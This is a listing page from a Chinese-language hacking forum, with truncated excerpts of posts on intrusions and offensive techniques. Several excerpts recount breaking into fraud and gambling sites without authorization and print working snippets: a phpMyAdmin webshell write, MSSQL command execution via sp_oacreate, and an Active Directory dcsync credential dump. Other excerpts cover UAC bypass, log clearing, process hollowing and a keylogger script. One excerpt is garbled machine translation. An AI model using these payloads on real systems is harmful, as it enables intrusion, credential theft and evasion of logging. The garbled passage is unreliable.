WEB and server security vulnerabilities
Hacker technology field, including internal and external network penetration, reverse cracking, network Trojan virus analysis and so on.
1,239 topics in this forum
-
- 4 replies
- 1.6k views
一、前言 简单的描述一下,有天因为很无聊,又想日点非法的网站,于是我就到反诈骗贴吧去逛了一圈,看能不能找到一些诈骗网站来操作一下,简简单单的翻了一下,立马锁定一个目标站,因为它后台是弱口令,哈哈哈!然后就有了接下来的操作,请往下看,但是之前有的没有截图,现在域名也不能访问了,不重要,来看思路! 二、渗透 信息收集 (1)因为一开始获取到了后台的弱口令,但是在后台中,发现并没有什么可以利用的地方,然后开始扫描二级域名、ip、目录等等,总体筛选下来发现有几个二级域名是客服聊天系统,然后尝试能否爆破,结果有验证码,不能绕过。 (2)陷入一丝困境,但是猛然发现辰光客服系统,随后丢到百度,看是否有开源系统,准备代码审计一波,结果突然看见一条这么个信息,然后点进去看了看,嗯!尝试!! 漏洞利用 (1)大概看了下这个漏洞是存在未授权上传漏洞,然后开始验证此战是否存在未授权上传漏洞,果不其然,存在此漏洞 (2)开始构造exp,非常简单 (3)成功上传php小马,并Getshell,接下来就进一步分析,看见一群网站,都分别打开看了下,全是各种各样的诈骗网站 提权 (1)先生成linux木马,反弹shell到msf上,因为是外网,别忘了出网,再查看下当前权限 (2)收集下内核信息 (3)使用了很多内核提权的模块都没有成功,然后在尝试了一下今年的模块,然后成功提权 http://image.g3e…
Last reply by flower X, -
- 5 replies
- 1.1k views
确定目标 收集信息 x.x.x.x 首先常规测试方法一顿怼,目录扫描,端口扫描,js文件,中间件,指纹识别,反正该上的都上。。。。 随手加个路径,报错了,当看到这个界面我瞬间就有思路了 为什么这么说呢,因为之前我就碰见过这样的网站报错, 这是一个php集成环境,叫upupw,跟phpstudy是一样的 upupw --> pmd phpstudy --> phpmyadmin 突破点 这个集成环境包也有个phpinfo的页面,跟数据库管理界面 u.php 测试一下弱口令 root/root 连接成功后就可以看到phpinfo的页面 好了现在问题变成phpmyadmin拿shell getshell 三步拿shell set global general_log='on'; SET global general_log_file='D:/xxxx/WWW/cmd.php'; SELECT '<?php assert($_POST["cmd"]);?>'; 当执行第三步的时候页面 卡在执行中。。。没有反应 瞬间感觉不对,可能存在waf 换了个免杀马试试,先写到txt里边看看成否成功 没有任何问题,下面直接写入php文件 …
Last reply by 风尘剑心, -
- 4 replies
- 1.7k views
前言 由于之前网站数据丢失了,发一个之前渗透过的博彩网站记录给大家看看吧。 没事打开电脑开始瞎逛,但是无意间发现之前渗透的非法网站又开起来了,但是只是一个宝塔页面,没有任何价值,于是在同ip下发现一个博彩网站,随之展开渗透 一、信息收集 1.以下由tfxxx来代替域名 锁定网站:tfxxx.com 2.查看服务器ip以及判断是否有cdn 这个没有cdn,很nice 3.目录扫描 总体来说,并没有得到什么有用的价值 4.二级域名扫描 不错,得到了一个后台 admin.tfxxx.com,留着待会看 5.端口扫描 全端口扫描,这里就不截图了,扫的太慢了,基本上也没有啥利用的,远程端口更改了,扫出来的是20119端口 二、漏洞探测 1.后台页面 通过上面收集的信息来说,还是比较局限,先不管吧,有一个后台,就来尝试一下后台登录,看是否ok 2.猜账户 随手一个admin,进入到输入密码和安全码的页面,输入其他账号会提示用户名不正确,所以这里判断账号为:admin 3.爆破安全码 这里开始爆破安全码,因为进入到这个界面随便输入一个安全码它…
Last reply by XenoG, -
- 0 replies
- 1.8k views
Windows中,windows,进程架构两模式访问模式访问访问访问访问处理器模式内核模式。这些模式模式的的实现的想法想法是是是保护保护保护用户应用应用程序程序不访问访问应用程序都运行在用户模式下,而操作系统代码(如系统服务和设备驱动程序)都运行在内核模式下。 模式特指种种执行执行模式执行执行种执行执行它它对所有所有内存和所有和所有所有所有所有所有所有所有所有所有所有所有和指令指令指令指令一些一些一些x86 x64 x64 x64 x64和处理器处理器处理器等级特权模式的处理器确定义了四个等级别 - 其他称为环- 以保护系统代号和数据。这些振铃等级的提示如下所示。 Windows中,Windows仅仅其中 -内核 -内核 -内核内核模式模式的的的的的环和模式和模式模式的的的的环现在。。。。。,在。,在在在在的的处理器处理器,处理器操作,处理器之间。。,“环级”安全性安全性安全性安全性的什么???那么??什么?什么什么?什么什么什么什么什么什么什么什么?什么什么启动启动启动用户用户模式应用应用时应用程序虚拟地址和个私有。。。这个柄柄表柄柄是是是一个包含句柄句柄的的的的内核内核对象对象。。。。句柄只是只是对特定特定特定资源资源资源api用户用户的内存内存,从而从而某些某些某些某些某些某些某些,例如例如管理某些管理物理物理物理。。。。总体总体总体而言总体而而总体,句柄作业一个句柄的例子。 因为程序是私有私有私有私有是私有私有私有私有一个个应用程序能能更改更改属于…
Last reply by KaiWn, -
- 0 replies
- 384 views
Transparent Tribe(“透明部落”)组织为Proofpoint于2016年2月披露并命名的组织,也称为C-Major、ProjectM,是一个具有南亚背景的APT组织。该组织的主要攻击目标为印度政府、军队或相关组织,其利用社会工程学进行鱼叉攻击,向目标投递带有VBA的doc、xls文档,执行诱饵文档中的宏代码释放执行CrimsonRAT、PeppyRAT,窃取相关敏感资料信息。 近日,奇安信威胁情报中心红雨滴在日常的威胁狩猎发现,Transparent Tribe近期针对南亚地区的攻击活动主要以国防部会议、军事材料等为主题。根据红雨滴研究人员跟踪分析,此次的攻击活动有如下特点: 在此次攻击活动中,攻击者利用此前披露的透明部落组织类似攻击手法,即通过带恶意宏的文档最终释放CrimsonRAT执行。 未发现影响国内,基于奇安信威胁情报中心的威胁情报数据的全线产品,包括威胁情报平台(TIP)、天眼高级威胁检测系统、NGSOC、奇安信态势感知等,都已经支持对此APT攻击团伙攻击活动的精准检测。 样本分析 01 基本信息 样本1:以印度国防部会议记录信息为诱饵的恶意PPT 文件名 Minutes of Meeting.ppt MD5 …
Last reply by 风尘剑心, -
- 0 replies
- 214 views
利用COM执行命令 (需要开启Ole Automation Procedures组件) declare @luan int,@exec int,@text int,@str varchar(8000); exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@luan output; exec sp_oamethod @luan,'exec',@exec output,'C:\\Windows\\System32\\cmd.exe /c whoami'; exec sp_oamethod @exec, 'StdOut', @text out; exec sp_oamethod @text, 'readall', @str out; select @str; 没有开启Ole Automation Procedures,可以用下面的命令开启 sp_configure 'show advanced options', 1; GO RECONFIGURE; GO sp_configure 'Ole Automation Procedures', 1; GO RECONFIGURE; GO 编写CLR实现执行命令 编写语言:C# Vs创建类库 using System; using System.Collections.Generic; using System.Lin…
Last reply by CNHAT, -
- 0 replies
- 497 views
根据ThinkPHP框架约定可以通过a参数来指定对应的函数名,但是该函数的修饰符必须为Public, 而添加的代码正好符合该条件。 可以通过如下URL进行访问,并且可以添加GET参数arg1传递给函数。 漏洞危害 远程攻击者在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。 影响版本 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2 复现过程 漏洞出在:application\Portal\Controller\IndexController.class.php 首先引用Common\Controller\HomebaseController控制类文件,然后调用display函数 跟入display函数看描述就是可以自定义加载模版,通过$this->parseTemplate 函数根据约定确定模版路径,如果不符合原先的约定将会从当前目录开始匹配。 public function parseTemplate($template='') { $tmpl_path=C("SP_TMPL_PATH"); //…
Last reply by 轩辕三官, -
- 0 replies
- 337 views
克隆后的html和原html对比 特征: IFRAME标签为大写,且长宽为0。 script标签加载了js路径为”/jquery/jquery.min.js” 顺序特征: IFRAME标签和script标签同时出现时,一定是IFRAME标签、script标签和body标签这个顺序。 IFRAME标签和script标签只出现一个时,一定在body标签之前。 引用的js分析: var cfqPdaQzXzSSf = 0; window.onload = function loadfqPdaQzXzSSf() { //页面加载处理事件 lfqPdaQzXzSSf = ","; if (window.addEventListener) { //对象触发指定的事件 document.addEventListener('keypress', pfqPdaQzXzSSf, true); //keypress所有键都会触发该事件,无论它们是否产生字符值 处理函数:pfqPdaQzXzSSf document.addEventListener('keydown', dfqPdaQzXzSSf, true); //keydown当按下某个键时会触发该事件 处理函数:dfqPd…
Last reply by KaiWn, -
- 0 replies
- 177 views
运行环境:YAYI.local - Windows Server 2012 - DC ----- YAYI.local - Windows 7 - 域机器(WIN-BMIO66D4K15) 在域控机器执行 powershell下运行 如果要在非DC下执行需要执行命令:Import-Module Microsoft.ActiveDirectory.Management.dll #导入Microsoft.ActiveDirectory.Management.dll #添加机器账户 New-ADComputer -Name ATTACKER10 -AccountPassword (ConvertTo-SecureString -String "Hjk123456!" -Force -AsPlainText) #设置机器账户的userAccountControl (需要域管权限) $ADComputer=Get-ADComputer -Identity ATTACKER10 Set-ADObject -Identity $ADComputer -Replace @{userAccountControl=8192} #查询域DC机器 Get-ADGroupMember -Identity "Domain Controllers" 域内机器执行dcsync dump (需要等待几分钟) mimikatz: lsadump::dcsync…
Last reply by CHQ1d, -
- 1 reply
- 383 views
前言 上午在推特逛街,看到了个这个bypassuac。复现了一下,写个笔记 正文 lnk:https://www.ddosi.org/iscsicpl-bypassuac/ poc:https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC/archive/refs/heads/main.zip c:\Windows\syswow64\iscsicpl.exe缺少iscsiexe.dll和iscsiexe_org.dll sigcheck检测,autoElevate为true。进程权限自提升 翻看代码,作者修改了注册表的HKEY_CURRENT_USER\Environment Path的键值为当前用户的TMP目录。看了一下这个注册表的键值和PATH环境变量最后一个路径对应,修改该注册表相当于直接动环境变量路径最后一个路径 HKEY_CURRENT_USER\Environment注册表路径参考链接:https://baike.baidu.com/item/%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F/1730949 (当然也可以直接修改windir环境变量,然后dll丢到对应目录) 重复说一下DLL加载顺序 …
Last reply by Anonymous, -
御剑后台扫描珍藏版.zip
Last reply by flower X, -
- 0 replies
- 220 views
0x00 前言 最近,Proofpoint的Matthew Mesa和Axel F发现了一种新的钓鱼方法,攻击者使用故障排除包作为电子邮件附件,诱骗用户运行并秘密执行有效载荷。在文章中,他们介绍了攻击者采用的方法和隐藏方法,提示用户对此保持警惕。 文章链接: https://www . proof point . com/us/threat-insight/post/windows-故障排除-平台利用-交付-恶意软件 本文将从技术研究的角度,介绍如何开发一个包含有效载荷的故障排除包,并结合攻击思路分析防御方法,希望能帮助你对这项技术有进一步的了解。 0x01 简介 Windows故障诊断平台: 翻译Windows故障排除平台,缩写为WTP。 开发者可以基于该平台编写故障排除包,帮助用户解决PC问题。 WTP结构如图所示 图片引自https://msdn.microsoft.com/en-us/library/windows/desktop/dd323706(v=vs . 85). aspx 简要流程如下: 检查故障排除包的数字签名,如果不可用,直接退出。 依次执行检测脚本、解决脚本和验证脚本,尝试解决故障。 生成结果报告和调试报告。 故障排除包: 它由五个部分组成: 清单故障排除(清单故障排除) 检测脚本(检测脚本) 解析脚本(解析脚本) 验证脚本(验证脚本) 本地化资源(本地化资源) 详情见图。 …
Last reply by Xiao7, -
- 0 replies
- 374 views
0x00 前言 在渗透测试过程中,Windows日志往往会记录系统上的敏感操作,如添加用户、远程登录等。 对于完整的渗透测试,通常会清除并绕过Windows日志。对于防御者来说,了解常见的绕过方法也有助于更好的保护自己的系统。 因此,本文将介绍常见的清除和绕过Windows日志的方法,分享经验,帮助大家。 0x01 简介 本文将介绍以下内容: Windows日志的常用清除方法 绕过Windows日志的两种方法 0x02 Windows日志 Windows日志包括五个类别: 应用程序 安全的 设置 系统 转发事件 查看方式: 1、通过面板 位置如下: 控制面板\系统和安全-查看事件日志-Windows日志 如下图 2、通过Powershell 常见命令如下: (管理员权限) 查看所有日志: 获得WinEvent 查看应用程序类别下的日志: get-WinEvent-filter hashtable @ { logname=' Application ';} 0x03 Windows日志的常用清除方法 1、wevtutil.exe 操作系统默认包括,支持的系统:Win7及以上 常见命令如下: (1)统计日志列表,查询所有日志信息,包括时间和数量。 wevtutil.exe gli应用程序 操作如下 (2)查看指定类别的日志内容 文本…
Last reply by 剑道尘心, -
- 0 replies
- 216 views
0x00 前言 我从滥用Windows遥测技术实现持久性中学到了一种由TelemetryController实现的自启动后门方法。在Win10下测试没有问题,但是在Win7和Server2012R2下测试遇到了不同的结果。 本文将记录我的学习经历,分析使用方法,并给出答辩建议。 参考资料: https://www . trusted sec . com/blog/abiling-windows-telemetry-for-persistence/ 0x01 简介 本文将介绍以下内容: 基础知识 常规利用方法 Win7和Server2012R2中的问题 解决办法 使用方法 辩护建议 0x02 基础知识 1.TelemetryController 相应的过程是CompatTelRunner.exe。 CompatTelRunner.exe称之为Windows兼容遥测监控程序。它定期向微软发送使用和性能数据,以改善用户体验并修复潜在的错误。 通常是用来升级win10进行兼容性检查的程序。 由计划任务Microsoft兼容性鉴定员启动 默认情况下,计划任务Microsoft兼容性鉴定器处于启用状态,每隔一天自动运行,任何用户登录时也会运行。 2.计划任务Microsoft Compatibility Appraiser (1)通过面板查看计划任务 启动taskschd.msc 选择任务计划程序(本地)-任务计划程序库-Mic…
Last reply by KaiWn, -
- 0 replies
- 274 views
0x00 前言 DanderSpritz是NSA的一个界面远程控制工具,基于FuzzBunch框架,可以通过执行Start.jar来启动 在实际的测试过程中,由于文档的缺乏,遇到了很多问题,有些细节值得进一步研究。 因此,本文将帮助您解答问题,分享测试经验,并根据木马的特点分析防御思路。 0x01 简介 本文将介绍以下内容: 执行pc_prep时得不到echo的原因及解决方法 与Pc 2.2的区别 3级和4级特洛伊木马的含义及其使用方法 不同类型的特洛伊木马之间的差异 特洛伊木马利用模式 Windows单一日志删除功能 特洛伊木马查杀创意 0x02 实际测试 测试环境: Win7 x86 安装以下工具: python2.6 pywin32 jdk 1、下载fuzzbunch 参考链接: https://github.com/3gstudent/fuzzbunch 注: 我分叉了公共的fuzzbunch项目(https://github . com/fuzz bunch/fuzz bunch),增加了一些内容解决了一个bug。具体内容稍后介绍。 2、直接运行Start.jar 画 设置启动参数,日志目录需要设置为固定格式:c:\logs\xxx(xxx为任意名称) 否则会出现错误,如下图所示。 注: 网上有分析文章认为应该先用fb.py生成一个日志文件,然后Star…
Last reply by CHQ1d, -
- 0 replies
- 199 views
0x00 前言 本文记录从零开始搭建VMware Workspace ONE Access漏洞调试环境的细节。 0x01 简介 本文将要介绍以下内容: VMware Workspace ONE Access安装 VMware Workspace ONE Access漏洞调试环境配置 常用知识 0x02 VMware Workspace ONE Access安装 参考资料: https://份文件。VMware。com/en/VMware-Workspace-ONE-Access/20.01/Workspace _ ONE _ Access _ install。可移植文档格式文件的扩展名(portable document format的缩写) 1.下载OVA文件 下载页面: https://customerconnect.vmware.com/downloads/search?查询=工作空间一次访问 下载前需要先注册用户,之后选择需要的版本进行下载 VMware Workspace ONE访问21.08.0.1的下载页面:https://customerconnect.vmware.com/downloads/details?下载group=WS1A _ on prem _ 210801产品id=1269 下载文件身份管理器-21.08.0.1-19010796_OVF10.ova 2.安装 (1)在VMware Workstation中导入OVA文…
Last reply by Anonymous, -
傀儡进程的实现与检测
by XenoG- 0 replies
- 176 views
0x00 前言 最近在安全动态推送中看到了一篇文章《RunPE: How to hide code behind a legit process》 ,介绍了将恶意代码注于已知进程的方法 文章发布于2015年6月,虽然作者未公布完整的实现代码,但介绍了实现思路 本文将结合自己的心得做进一步介绍,测试开源实现代码,介绍防御方法 文章地址: https://www.adlice.com/runpe-hide-code-behind-legit-process/ 0x01 简介 本文将要介绍以下内容: 实现原理 开源代码测试 优化思路 防御检测 0x02 实现原理 这个利用方法至少在2005以前就存在,国内常常把该方法称为"傀儡进程的创建" 实现思路: 通过创建流程创建进程,传入参数创建_暂停使进程挂起 通过NtUnmapViewOfSection清空新进程的内存数据 通过虚拟分配申请新的内存 通过WriteProcessMemory向内存写入有效载荷 通过SetThreadContext设置入口点 通过ResumeThread唤醒进程,执行有效载荷 在具体实现上,还需要考虑以下问题: 1、傀儡进程的选择 如果傀儡进程已经运行,那么将无法实现替换(指针不可控、无法获得主线程句柄等) 所以这种利用方法只能通过创建新进程,传入参数创建_暂停使进程挂起,在进程执行前对其替换 2、清空新进程的内存数据 进程初始化后…
Last reply by XenoG, -
带有VSTO的办公室后门
by 风尘剑心- 0 replies
- 175 views
0x00 前言 最近看了一篇文章《VSTO: The Payload Installer That Probably Defeats Your Application Whitelisting Rules》,介绍了利用VSTO实现Office后门的方法。我在之前的文章《Use Office to maintain persistence》和《Office Persistence on x64 operating system》研究过Office的后门。本文将重现这种方法,分析利用思路,分享实用的利用方法,最后介绍如何识别这个后门。 文章地址: https://bohops . com/2018/01/31/VSTO-the-payload-installer-that-possible-failed-your-application-whitelisting-rules/ 0x01 简介 本文将介绍以下内容: VSTO的编写方法 实用思维 后门检测 0x02 VSTO的编写方法 1、VSTO简介 Visual Studio Tools for Office的全名 用于自定义office应用程序并与Office控件交互。 在集成的Visual Studio安装包中 如下图 2、VSTO开发 本部分是《VSTO: The Payload Installer That Probably Defeats Your Application Whitelis…
Last reply by 风尘剑心, -
- 0 replies
- 205 views
0x00 前言 在之前的文章《渗透基础——通过LDAP协议暴力破解域用户的口令》中介绍了通过LDAP协议暴力破解域用户密码的方法,最大的特点是会生成一个日志(4625-An账号登录失败)。 但是使用Kerberos预授权暴力破解时,会没有日志(4625-An账号登录失败),所以我对Kerberos做了进一步的研究,用python实现了同样的功能,增加了支持TCP协议和NTLM哈希的验证。本文将记录我自己的研究过程和学习经历。 0x01 简介 Brute简介 野蛮原则 使用python实现Kerberos的细节 开源代码pyKerbrute Kerberos预授权暴力的检测 0x02 kerbrute的适用场景 适用场景:从域外对域用户进行用户枚举和密码暴力破解。 由于没有域用户的密码,LDAP协议无法枚举所有域用户,在LDAP协议进行暴力破解时会产生一个日志(4625-An账号登录失败)。 使用Kerberos有以下优点: 使用Kerberos预授权强制更快。 不会生成日志(4625-帐户登录失败) 注: 默认情况下,Kerberos-auth对应的端口是88。 0x03 kerbrute测试 测试环境如下 Kerbrute是用Go语言开发的,github提供编译后的文件,地址如下: https://github.com/ropnop/kerbrute/releases Kerbrute主要包括以下两个函数: …
Last reply by 轩辕三官, -
- 0 replies
- 380 views
0x00 前言 Windows XML事件日志(EVTX)单条日志清除系列文章的第一篇,侧重于介绍evtx日志文件的基础知识和删除单条日志的实现思路与实例 0x01 简介 本文将要介绍以下内容: evtx文件格式 删除单条日志的思路 删除单条日志的实例 0x02 基础知识:evtx文件格式 可参考的资料: https://github.com/williballenthin/python-evtx evtx文件是指Windows Vista之后用于保存系统日志信息的文件 evtx文件结构包含三部分: 文件标题 大块 尾随空值 注: 文件标题保存evtx文件基本信息,值得注意的是下一个记录标识符、块数量、文件标志和校验和 大块保存日志内容,包括具体每条日志的内容和校验和,值得注意的是最后事件记录号、最后事件记录标识符、最后事件记录数据偏移量和两个校验和 尾随空值为尾随空值,用于填充文件长度,内容任意,不会影响evtx文件的有效性 (1) file header 格式可参考: https://github。com/libyal/libevtx/blob/master/documentation/Windows XML事件日志(evtx).ascii文件# 2-文件头 (2) chunks 格式可参考: https://github。com/libyal/libevtx/blob/master/docum…
Last reply by RenX6,